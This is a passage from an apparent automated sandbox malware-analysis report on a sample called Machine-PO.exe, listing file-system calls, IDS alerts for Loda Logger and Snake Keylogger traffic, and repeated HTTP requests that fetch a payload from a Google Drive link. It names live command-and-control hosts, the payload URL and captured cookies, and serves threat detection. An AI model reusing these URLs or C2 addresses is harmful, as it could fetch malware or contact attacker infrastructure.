                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00246B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00246B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00246E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00246E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0024F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024FD47 FindFirstFileW,FindClose,10_2_0024FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0021DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0024FDD2
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 70MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49729 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49729 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.8:49714 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49805 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49808 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49808 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49786 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49903 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49802 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.8:49962 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49962 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:50055 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49806 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49809 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:49838 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.8:50084 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49709 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49715 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49713 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49727 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49720 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49754 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49710 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49745 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49726 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49762 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49750 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49769 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49768 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49756 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49747 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49740 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49739 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49751 -> 216.58.206.46:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.8:49719 -> 216.58.206.46:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0025550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_0025550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
